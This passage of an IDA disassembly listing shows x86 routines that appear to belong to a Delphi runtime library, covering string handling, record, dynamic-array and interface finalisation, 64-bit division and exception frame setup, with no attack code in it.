mov eax, [edx-4]
call sub_401E84
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_401264
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_40209E
dec dword ptr [eax-8]
jnz short loc_40209E
lea eax, [eax-8]
call sub_40115C
loc_40209E: ; CODE XREF: sub_402064+2B�j
; sub_402064+30�j
mov edx, [ebx]
pop ebx
loc_4020A1: ; CODE XREF: sub_402064+4�j
; sub_402064+A�j
mov eax, edx
retn
sub_402064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4020A4 proc near ; CODE XREF: sub_4020F4+9�p
jmp sub_402064
sub_4020A4 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4020AC proc near ; CODE XREF: sub_402C0C+56�p
; sub_402CDC+8E�p ...
jmp sub_402064
sub_4020AC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4020B4 proc near ; CODE XREF: sub_403168+AA�p
; sub_403168+F1�p ...
arg_0 = dword ptr 4
push ebx
test eax, eax
jz short loc_4020E6
mov ebx, [eax-4]
test ebx, ebx
jz short loc_4020E6
dec edx
jl short loc_4020DE
cmp edx, ebx
jge short loc_4020E6
loc_4020C7: ; CODE XREF: sub_4020B4+2C�j
sub ebx, edx
test ecx, ecx
jl short loc_4020E6
cmp ecx, ebx
jg short loc_4020E2
loc_4020D1: ; CODE XREF: sub_4020B4+30�j
add edx, eax
mov eax, [esp+4+arg_0]
call sub_401EB0
jmp short loc_4020EF
; ---------------------------------------------------------------------------
loc_4020DE: ; CODE XREF: sub_4020B4+D�j
xor edx, edx
jmp short loc_4020C7
; ---------------------------------------------------------------------------
loc_4020E2: ; CODE XREF: sub_4020B4+1B�j
mov ecx, ebx
jmp short loc_4020D1
; ---------------------------------------------------------------------------
loc_4020E6: ; CODE XREF: sub_4020B4+3�j
; sub_4020B4+A�j ...
mov eax, [esp+4+arg_0]
call sub_401DC4
loc_4020EF: ; CODE XREF: sub_4020B4+28�j
pop ebx
retn 4
sub_4020B4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4020F4 proc near ; CODE XREF: sub_403168+4C�p
; sub_403168+D0�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
call sub_4020A4
mov edx, [ebx]
test edx, edx
jz short loc_402138
mov ecx, [edx-4]
dec esi
jl short loc_402138
cmp esi, ecx
jge short loc_402138
test edi, edi
jle short loc_402138
sub ecx, esi
cmp edi, ecx
jle short loc_40211E
mov edi, ecx
loc_40211E: ; CODE XREF: sub_4020F4+26�j
sub ecx, edi
add edx, esi
lea eax, [edi+edx]
call sub_401264
mov edx, [ebx]
mov eax, ebx
mov edx, [edx-4]
sub edx, edi
call sub_402184
loc_402138: ; CODE XREF: sub_4020F4+12�j
; sub_4020F4+18�j ...
pop edi
pop esi
pop ebx
retn
sub_4020F4 endp
; =============== S U B R O U T I N E =======================================
sub_40213C proc near ; CODE XREF: sub_403168+3D�p
; sub_403168+59�p ...
test eax, eax
jz short locret_402180
test edx, edx
jz short loc_402175
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
mov ecx, [edi-4]
push edi
mov edx, [esi-4]
dec edx
js short loc_402170
mov al, [esi]
inc esi
sub ecx, edx
jle short loc_402170
loc_40215C: ; CODE XREF: sub_40213C+32�j
repne scasb
jnz short loc_402170
mov ebx, ecx
push esi
push edi
mov ecx, edx
repe cmpsb
pop edi
pop esi
jz short loc_402178
mov ecx, ebx
jmp short loc_40215C
; ---------------------------------------------------------------------------
loc_402170: ; CODE XREF: sub_40213C+17�j
; sub_40213C+1E�j ...
pop edx
xor eax, eax
jmp short loc_40217D
; ---------------------------------------------------------------------------
loc_402175: ; CODE XREF: sub_40213C+6�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402178: ; CODE XREF: sub_40213C+2E�j
pop edx
mov eax, edi
sub eax, edx
loc_40217D: ; CODE XREF: sub_40213C+37�j
pop edi
pop esi
pop ebx
locret_402180: ; CODE XREF: sub_40213C+2�j
retn
sub_40213C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402184 proc near ; CODE XREF: sub_4012C4+7F�p
; sub_401F0C+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_4021D9
mov eax, [ebx]
test eax, eax
jz short loc_4021BA
cmp dword ptr [eax-8], 1
jnz short loc_4021BA
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_401174
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_4021E2
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_402184+11�j
; sub_402184+17�j
mov eax, edx
call sub_401E84
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_4021D9
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_4021D4
mov ecx, esi
loc_4021D4: ; CODE XREF: sub_402184+4C�j
call sub_401264
loc_4021D9: ; CODE XREF: sub_402184+B�j
; sub_402184+43�j
mov eax, ebx
call sub_401DC4
mov [ebx], edi
loc_4021E2: ; CODE XREF: sub_402184+34�j
pop edi
pop esi
pop ebx
retn
sub_402184 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_402208
loc_4021E8: ; CODE XREF: sub_402208+1D�j
mov al, 1
jmp sub_40121C
; END OF FUNCTION CHUNK FOR sub_402208
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402208
loc_4021F0: ; CODE XREF: sub_402208+2�j
; sub_402208+D�j
mov edx, [eax]
test edx, edx
jz short locret_402204
mov dword ptr [eax], 0
push eax
push edx
call sub_4010E4
pop eax
locret_402204: ; CODE XREF: sub_402208-14�j
retn
; END OF FUNCTION CHUNK FOR sub_402208
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402208 proc near ; CODE XREF: sub_402350+81�p
; sub_40246C+61�p
; FUNCTION CHUNK AT 004021E8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004021F0 SIZE 00000015 BYTES
test edx, edx
jz loc_4021F0
mov ecx, [edx-4]
shr ecx, 1
jz loc_4021F0
push ecx
push edx
push eax
call sub_4010DC
test eax, eax
jz loc_4021E8
retn
sub_402208 endp
; =============== S U B R O U T I N E =======================================
sub_40222C proc near ; CODE XREF: sub_402260+B1�p
xor ecx, ecx
push ebx
mov cl, [edx+1]
push esi
push edi
mov ebx, eax
lea esi, [ecx+edx+0Ah]
mov edi, [ecx+edx+6]
loc_40223E: ; CODE XREF: sub_40222C+29�j
mov edx, [esi]
mov eax, [esi+4]
add eax, ebx
mov edx, [edx]
mov ecx, 1
call sub_402260
add esi, 8
dec edi
jg short loc_40223E
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_40222C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402260 proc near ; CODE XREF: sub_40222C+20�p
; sub_402260+9B�p ...
cmp ecx, 0
jz locret_40234B
push eax
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
xor edx, edx
mov al, [esi]
mov dl, [esi+1]
cmp al, 0Ah
jz short loc_4022A3
cmp al, 0Bh
jz short loc_4022C0
cmp al, 0Ch
jz short loc_4022D9
cmp al, 0Dh
jz short loc_4022E8
cmp al, 0Eh
jz short loc_402306
cmp al, 0Fh
jz loc_40231C
cmp al, 11h
jz loc_40232B
jmp loc_40233C
; ---------------------------------------------------------------------------
loc_4022A3: ; CODE XREF: sub_402260+1C�j
cmp ecx, 1
mov eax, ebx
jg short loc_4022B4
call sub_401DC4
jmp loc_402347
; ---------------------------------------------------------------------------
loc_4022B4: ; CODE XREF: sub_402260+48�j
mov edx, ecx
call sub_401DE8
jmp loc_402347
; ---------------------------------------------------------------------------
loc_4022C0: ; CODE XREF: sub_402260+20�j
cmp ecx, 1
mov eax, ebx
jg short loc_4022CF
call ds:off_405024
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_4022CF: ; CODE XREF: sub_402260+65�j
mov edx, ecx
call ds:off_405028
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_4022D9: ; CODE XREF: sub_402260+24�j
; sub_402260+84�j
mov eax, ebx
add ebx, 10h
call sub_4025B0
dec edi
jg short loc_4022D9
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_4022E8: ; CODE XREF: sub_402260+28�j
push ebp
mov ebp, edx
loc_4022EB: ; CODE XREF: sub_402260+A1�j
mov edx, [esi+ebp+0Ah]
mov eax, ebx
add ebx, [esi+ebp+2]
mov ecx, [esi+ebp+6]
mov edx, [edx]
call sub_402260
dec edi
jg short loc_4022EB
pop ebp
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_402306: ; CODE XREF: sub_402260+2C�j
push ebp
mov ebp, edx
loc_402309: ; CODE XREF: sub_402260+B7�j
mov eax, ebx
add ebx, [esi+ebp+2]
mov edx, esi
call sub_40222C
dec edi
jg short loc_402309
pop ebp
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_40231C: ; CODE XREF: sub_402260+30�j
; sub_402260+C7�j
mov eax, ebx
add ebx, 4
call sub_402888
dec edi
jg short loc_40231C
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_40232B: ; CODE XREF: sub_402260+38�j
; sub_402260+D8�j
mov eax, ebx
mov edx, esi
add ebx, 4
call sub_4027F4
dec edi
jg short loc_40232B
jmp short loc_402347
; ---------------------------------------------------------------------------
loc_40233C: ; CODE XREF: sub_402260+3E�j
pop edi
pop esi
pop ebx
pop eax
mov al, 2
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_402347: ; CODE XREF: sub_402260+4F�j
; sub_402260+5B�j ...
pop edi
pop esi
pop ebx
pop eax
locret_40234B: ; CODE XREF: sub_402260+3�j
retn
sub_402260 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_402350 proc near ; CODE XREF: sub_402350+CF�p
; sub_40246C+AC�p
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
xor eax, eax
mov al, [ecx+1]
lea edi, [eax+ecx+0Ah]
mov ebp, [edi-4]
xor eax, eax
mov ecx, [edi-8]
push ecx
loc_40236A: ; CODE XREF: sub_402350+100�j
mov ecx, [edi+4]
sub ecx, eax
jle short loc_40237C
mov edx, eax
add eax, esi
add edx, ebx
call sub_401264
loc_40237C: ; CODE XREF: sub_402350+1F�j
mov eax, [edi+4]
mov edx, [edi]
mov edx, [edx]
mov cl, [edx]
cmp cl, 0Ah
jz short loc_4023BB
cmp cl, 0Bh
jz short loc_4023CC
cmp cl, 0Ch
jz short loc_4023DD
cmp cl, 0Dh
jz short loc_4023EE
cmp cl, 0Eh
jz short loc_40240E
cmp cl, 0Fh
jz loc_402427
cmp cl, 11h
jz loc_402438
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_4023BB: ; CODE XREF: sub_402350+38�j
mov edx, [eax+esi]
add eax, ebx
call sub_401E18
mov eax, 4
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_4023CC: ; CODE XREF: sub_402350+3D�j
mov edx, [eax+esi]
add eax, ebx
call sub_402208
mov eax, 4
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_4023DD: ; CODE XREF: sub_402350+42�j
lea edx, [eax+esi]
add eax, ebx
call sub_4025A8
mov eax, 10h
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_402350+47�j
xor ecx, ecx
mov cl, [edx+1]
push dword ptr [ecx+edx+2]
push dword ptr [ecx+edx+6]
mov ecx, [ecx+edx+0Ah]
mov ecx, [ecx]
lea edx, [eax+esi]
add eax, ebx
call sub_40246C
pop eax
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_40240E: ; CODE XREF: sub_402350+4C�j
xor ecx, ecx
mov cl, [edx+1]
mov ecx, [ecx+edx+2]
push ecx
mov ecx, edx
lea edx, [eax+esi]
add eax, ebx
call sub_402350
pop eax
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_402427: ; CODE XREF: sub_402350+51�j
mov edx, [eax+esi]
add eax, ebx
call sub_4028A0
mov eax, 4
jmp short loc_402449
; ---------------------------------------------------------------------------
loc_402438: ; CODE XREF: sub_402350+5A�j
mov ecx, edx
mov edx, [eax+esi]
add eax, ebx
call sub_402830
mov eax, 4
loc_402449: ; CODE XREF: sub_402350+7A�j
; sub_402350+8B�j ...
add eax, [edi+4]
add edi, 8
dec ebp
jnz loc_40236A
pop ecx
sub ecx, eax
jle short loc_402465
lea edx, [eax+ebx]
add eax, esi
call sub_401264
loc_402465: ; CODE XREF: sub_402350+109�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_402350 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40246C proc near ; CODE XREF: sub_402350+B6�p
; sub_40246C+98�p ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
mov edi, ecx
mov ebp, [esp+10h+arg_0]
mov cl, [edi]
cmp cl, 0Ah
jz short loc_4024B2
cmp cl, 0Bh
jz short loc_4024C9
cmp cl, 0Ch
jz short loc_4024DD
cmp cl, 0Dh
jz short loc_4024F1
cmp cl, 0Eh
jz short loc_402512
cmp cl, 0Fh
jz loc_40252F
cmp cl, 11h
jz loc_402543
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_4024B2: ; CODE XREF: sub_40246C+13�j
; sub_40246C+56�j
mov eax, ebx
mov edx, [esi]
call sub_401E18
add ebx, 4
add esi, 4
dec ebp
jnz short loc_4024B2
jmp loc_402557
; ---------------------------------------------------------------------------
loc_4024C9: ; CODE XREF: sub_40246C+18�j
; sub_40246C+6D�j
mov eax, ebx
mov edx, [esi]
call sub_402208
add ebx, 4
add esi, 4
dec ebp
jnz short loc_4024C9
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_4024DD: ; CODE XREF: sub_40246C+1D�j
; sub_40246C+81�j
mov eax, ebx
mov edx, esi
call sub_4025A8
add ebx, 10h
add esi, 10h
dec ebp
jnz short loc_4024DD
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_4024F1: ; CODE XREF: sub_40246C+22�j
xor ecx, ecx
mov cl, [edi+1]
lea edi, [ecx+edi+2]
loc_4024FA: ; CODE XREF: sub_40246C+A2�j
mov eax, ebx
mov edx, esi
mov ecx, [edi+8]
push dword ptr [edi+4]
call sub_40246C
add ebx, [edi]
add esi, [edi]
dec ebp
jnz short loc_4024FA
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_402512: ; CODE XREF: sub_40246C+27�j
; sub_40246C+BF�j
mov eax, ebx
mov edx, esi
mov ecx, edi
call sub_402350
xor eax, eax
mov al, [edi+1]
add ebx, [eax+edi+2]
add esi, [eax+edi+2]
dec ebp
jnz short loc_402512
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_40252F: ; CODE XREF: sub_40246C+2C�j
; sub_40246C+D3�j
mov eax, ebx
mov edx, [esi]
call sub_4028A0
add ebx, 4
add esi, 4
dec ebp
jnz short loc_40252F
jmp short loc_402557
; ---------------------------------------------------------------------------
loc_402543: ; CODE XREF: sub_40246C+35�j
; sub_40246C+E9�j
mov eax, ebx
mov edx, [esi]
mov ecx, edi
call sub_402830
add ebx, 4
add esi, 4
dec ebp
jnz short loc_402543
loc_402557: ; CODE XREF: sub_40246C+58�j
; sub_40246C+6F�j ...
pop ebp
pop edi
pop esi
pop ebx
retn 4
sub_40246C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402560 proc near ; CODE XREF: sub_402568+F�p sub_4025A8�j
; DATA XREF: ...
mov al, 10h
jmp sub_40121C
sub_402560 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402568 proc near ; CODE XREF: sub_4025A0�j
; DATA XREF: sub_402580+14�o ...
mov ax, [eax]
sub ax, 2
jb short locret_40257C
sub ax, 8
jz short locret_40257C
call sub_402560
; ---------------------------------------------------------------------------
locret_40257C: ; CODE XREF: sub_402568+7�j
; sub_402568+D�j
retn
sub_402568 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402580 proc near ; CODE XREF: sub_402914+1D�p
mov edx, offset off_4063F4
xor eax, eax
loc_402587: ; CODE XREF: sub_402580+12�j
mov dword ptr [edx+eax*4], offset sub_402560
inc eax
cmp eax, 2Bh
jnz short loc_402587
mov eax, offset sub_402568
mov ds:off_4063F4, eax
retn
sub_402580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4025A0 proc near ; CODE XREF: sub_4025B0+1�p
jmp ds:off_4063F4
sub_4025A0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4025A8 proc near ; CODE XREF: sub_402350+92�p
; sub_40246C+75�p
jmp ds:off_4063F8
sub_4025A8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025B0 proc near ; CODE XREF: sub_402260+7E�p
push eax
call sub_4025A0
pop eax
retn
sub_4025B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4025B8 proc near ; DATA XREF: sub_402914+13�o
; BSS:off_406000�o
mov al, 11h
jmp sub_40121C
sub_4025B8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4025C0 proc near ; CODE XREF: sub_403900+65�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
push ebx
push esi
push edi
xor edi, edi
mov ebx, [esp+10h+arg_0]
mov ecx, [esp+10h+arg_4]
or ecx, ecx
jnz short loc_4025DA
or edx, edx
jz short loc_402632
or ebx, ebx
jz short loc_402632
loc_4025DA: ; CODE XREF: sub_4025C0+10�j
or edx, edx
jns short loc_4025E8
neg edx
neg eax
sbb edx, 0
or edi, 1
loc_4025E8: ; CODE XREF: sub_4025C0+1C�j
or ecx, ecx
jns short loc_4025F6
neg ecx
neg ebx
sbb ecx, 0
xor edi, 1
loc_4025F6: ; CODE XREF: sub_4025C0+2A�j
mov ebp, ecx
mov ecx, 40h
push edi
xor edi, edi
xor esi, esi
loc_402602: ; CODE XREF: sub_4025C0:loc_402619�j
shl eax, 1
rcl edx, 1
rcl esi, 1
rcl edi, 1
cmp edi, ebp
jb short loc_402619
ja short loc_402614
cmp esi, ebx
jb short loc_402619
loc_402614: ; CODE XREF: sub_4025C0+4E�j
sub esi, ebx
sbb edi, ebp
inc eax
loc_402619: ; CODE XREF: sub_4025C0+4C�j
; sub_4025C0+52�j
loop loc_402602
pop ebx
test ebx, 1
jz short loc_40262B
neg edx
neg eax
sbb edx, 0
loc_40262B: ; CODE XREF: sub_4025C0+62�j
; sub_4025C0+76�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_402632: ; CODE XREF: sub_4025C0+14�j
; sub_4025C0+18�j
div ebx
xor edx, edx
jmp short loc_40262B
sub_4025C0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40263C proc near ; CODE XREF: sub_40265C+106�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_40246C
pop ebp
retn 4
sub_40263C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40264C proc near ; CODE XREF: sub_40265C+B0�p
jmp sub_402260
sub_40264C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402654 proc near ; CODE XREF: sub_40265C+2F�p
call sub_4027F4
retn
sub_402654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40265C proc near ; CODE XREF: sub_40265C+173�p
; sub_4027E8+5�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov ebx, [ebp+var_4]
mov ebx, [ebx]
mov eax, [ebp+arg_0]
mov edi, [eax]
test edi, edi
jg short loc_402695
test edi, edi
jge short loc_402686
mov al, 4
call sub_40121C
; ---------------------------------------------------------------------------
loc_402686: ; CODE XREF: sub_40265C+21�j
mov eax, [ebp+var_4]
mov edx, esi
call sub_402654
jmp loc_4027DF
; ---------------------------------------------------------------------------
loc_402695: ; CODE XREF: sub_40265C+1D�j
xor eax, eax
mov [ebp+var_10], eax
test ebx, ebx
jz short loc_4026A9
sub ebx, 4
mov eax, [ebx]
mov [ebp+var_10], eax
sub ebx, 4
loc_4026A9: ; CODE XREF: sub_40265C+40�j
xor eax, eax
mov al, [esi+1]
add esi, eax
mov eax, esi
mov edx, [eax+2]
mov [ebp+var_18], edx
mov edx, [eax+6]
test edx, edx
jz short loc_4026C3
mov esi, [edx]
jmp short loc_4026C5
; ---------------------------------------------------------------------------
loc_4026C3: ; CODE XREF: sub_40265C+61�j
xor esi, esi
loc_4026C5: ; CODE XREF: sub_40265C+65�j
mov eax, edi
imul [ebp+var_18]
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cdq
idiv edi
cmp eax, [ebp+var_18]
jz short loc_4026DF
mov al, 4
call sub_40121C
; ---------------------------------------------------------------------------
loc_4026DF: ; CODE XREF: sub_40265C+7A�j
add [ebp+var_1C], 8
test ebx, ebx
jz short loc_4026EC
cmp dword ptr [ebx], 1
jnz short loc_402721
loc_4026EC: ; CODE XREF: sub_40265C+89�j
mov [ebp+var_20], ebx
cmp edi, [ebp+var_10]
jge short loc_402711
test esi, esi
jz short loc_402711
mov eax, ebx
add eax, 8
mov edx, edi
imul edx, [ebp+var_18]
add eax, edx
mov ecx, [ebp+var_10]
sub ecx, edi
mov edx, esi
call sub_40264C
loc_402711: ; CODE XREF: sub_40265C+96�j
; sub_40265C+9A�j
lea eax, [ebp+var_20]
mov edx, [ebp+var_1C]
call sub_401174
mov ebx, [ebp+var_20]
jmp short loc_40277F
; ---------------------------------------------------------------------------
loc_402721: ; CODE XREF: sub_40265C+8E�j
dec dword ptr [ebx]
mov eax, [ebp+var_1C]
call sub_401144
mov ebx, eax
mov eax, [ebp+var_10]
mov [ebp+var_14], eax
cmp edi, [ebp+var_14]
jge short loc_40273B
mov [ebp+var_14], edi
loc_40273B: ; CODE XREF: sub_40265C+DA�j
test esi, esi
jz short loc_402769
mov edx, [ebp+var_14]
imul edx, [ebp+var_18]
mov eax, ebx
add eax, 8
xor ecx, ecx
call sub_4018A8
mov eax, [ebp+var_14]
push eax
mov edx, [ebp+var_4]
mov edx, [edx]
mov eax, ebx
add eax, 8
mov ecx, esi
call sub_40263C
jmp short loc_40277F
; ---------------------------------------------------------------------------
loc_402769: ; CODE XREF: sub_40265C+E1�j
mov ecx, [ebp+var_14]
imul ecx, [ebp+var_18]
mov edx, ebx
add edx, 8
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_401264
loc_40277F: ; CODE XREF: sub_40265C+C3�j
; sub_40265C+10B�j
mov dword ptr [ebx], 1
add ebx, 4
mov [ebx], edi
add ebx, 4
mov edx, edi
sub edx, [ebp+var_10]
imul edx, [ebp+var_18]
mov eax, [ebp+var_18]
imul eax, [ebp+var_10]
add eax, ebx
xor ecx, ecx
call sub_4018A8
cmp [ebp+var_8], 1
jle short loc_4027DA
add [ebp+arg_0], 4
dec [ebp+var_8]
dec edi
test edi, edi
jl short loc_4027DA
inc edi
mov [ebp+var_C], 0
loc_4027C0: ; CODE XREF: sub_40265C+17C�j
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_C]
lea eax, [ebx+eax*4]
mov ecx, [ebp+var_8]
mov edx, esi
call sub_40265C
inc [ebp+var_C]
dec edi
jnz short loc_4027C0
loc_4027DA: ; CODE XREF: sub_40265C+14E�j
; sub_40265C+15A�j
mov eax, [ebp+var_4]
mov [eax], ebx
loc_4027DF: ; CODE XREF: sub_40265C+34�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40265C endp
; =============== S U B R O U T I N E =======================================
sub_4027E8 proc near ; CODE XREF: sub_403168+81�p
; sub_403168+132�p
var_4 = dword ptr -4
push esp
add [esp+4+var_4], 4
call sub_40265C
retn
sub_4027E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027F4 proc near ; CODE XREF: sub_402260+D2�p
; sub_402654�p ...
mov ecx, [eax]
test ecx, ecx
jz short locret_40282C
mov dword ptr [eax], 0
dec dword ptr [ecx-8]
jnz short locret_40282C
push eax
mov eax, ecx
xor ecx, ecx
mov cl, [edx+1]
mov edx, [ecx+edx+6]
test edx, edx
jz short loc_402823
mov ecx, [eax-4]
test ecx, ecx
jz short loc_402823
mov edx, [edx]
call sub_402260
loc_402823: ; CODE XREF: sub_4027F4+1F�j
; sub_4027F4+26�j
sub eax, 8
call sub_40115C
pop eax
locret_40282C: ; CODE XREF: sub_4027F4+4�j
; sub_4027F4+F�j
retn
sub_4027F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402830 proc near ; CODE XREF: sub_402350+EF�p
; sub_40246C+DD�p
push ebx
mov ebx, [eax]
test edx, edx
jz short loc_40283A
inc dword ptr [edx-8]
loc_40283A: ; CODE XREF: sub_402830+5�j
test ebx, ebx
jz short loc_402851
dec dword ptr [ebx-8]
jnz short loc_402851
push eax
push edx
mov edx, ecx
inc dword ptr [ebx-8]
call sub_4027F4
pop edx
pop eax
loc_402851: ; CODE XREF: sub_402830+C�j
; sub_402830+11�j
mov [eax], edx
pop ebx
retn
sub_402830 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402858 proc near ; CODE XREF: sub_4029DC+5�p
mov edx, ds:off_405018
mov [eax], edx
mov ds:off_405018, eax
retn
sub_402858 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402868 proc near ; CODE XREF: sub_401CDC+66�p
; DATA XREF: DATA:off_405020�o
push ebx
push esi
mov esi, eax
mov ebx, ds:dword_40501C
test ebx, ebx
jz short loc_402882
loc_402876: ; CODE XREF: sub_402868+18�j
mov eax, [esi+4]
call dword ptr [ebx+4]
mov ebx, [ebx]
test ebx, ebx
jnz short loc_402876
loc_402882: ; CODE XREF: sub_402868+C�j
pop esi
pop ebx
retn
sub_402868 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402888 proc near ; CODE XREF: sub_402260+C1�p
mov edx, [eax]
test edx, edx
jz short locret_40289C
mov dword ptr [eax], 0
push eax
push edx
mov eax, [edx]
call dword ptr [eax+8]
pop eax
locret_40289C: ; CODE XREF: sub_402888+4�j
retn
sub_402888 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4028A0 proc near ; CODE XREF: sub_402350+DC�p
; sub_40246C+C7�p
test edx, edx
jz short loc_4028BD
push edx
push eax
mov eax, [edx]
push edx
call dword ptr [eax+4]
pop eax
mov ecx, [eax]
pop dword ptr [eax]
test ecx, ecx
jnz short loc_4028B6
retn
; ---------------------------------------------------------------------------
loc_4028B6: ; CODE XREF: sub_4028A0+13�j
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
retn
; ---------------------------------------------------------------------------
loc_4028BD: ; CODE XREF: sub_4028A0+2�j
mov ecx, [eax]
test ecx, ecx
mov [eax], edx
jz short locret_4028CB
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
locret_4028CB: ; CODE XREF: sub_4028A0+23�j
retn
sub_4028A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028CC proc near ; DATA XREF: CODE:00403F78�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402908
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4063BC
jnz short loc_4028FA
cmp ds:dword_4063F0, 0
jz short loc_4028F4
call ds:dword_4063F0
loc_4028F4: ; CODE XREF: sub_4028CC+20�j
call ds:off_405038
loc_4028FA: ; CODE XREF: sub_4028CC+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40290F
loc_402907: ; CODE XREF: sub_4028CC+41�j
retn
; ---------------------------------------------------------------------------
loc_402908: ; DATA XREF: sub_4028CC+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402907
; ---------------------------------------------------------------------------
loc_40290F: ; CODE XREF: sub_4028CC:loc_402907�j
; DATA XREF: sub_4028CC+36�o
pop ebp
retn
sub_4028CC endp
; ---------------------------------------------------------------------------
align 4
